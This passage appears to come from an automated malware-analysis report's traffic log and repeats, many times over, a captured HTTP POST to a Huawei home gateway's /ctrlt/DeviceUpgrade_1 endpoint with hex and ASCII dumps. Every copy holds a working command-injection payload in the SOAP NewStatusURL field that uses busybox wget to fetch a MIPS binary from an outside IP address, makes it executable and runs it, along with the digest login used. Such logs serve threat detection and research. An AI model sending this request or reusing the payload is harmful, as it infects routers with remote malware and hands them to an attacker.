6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 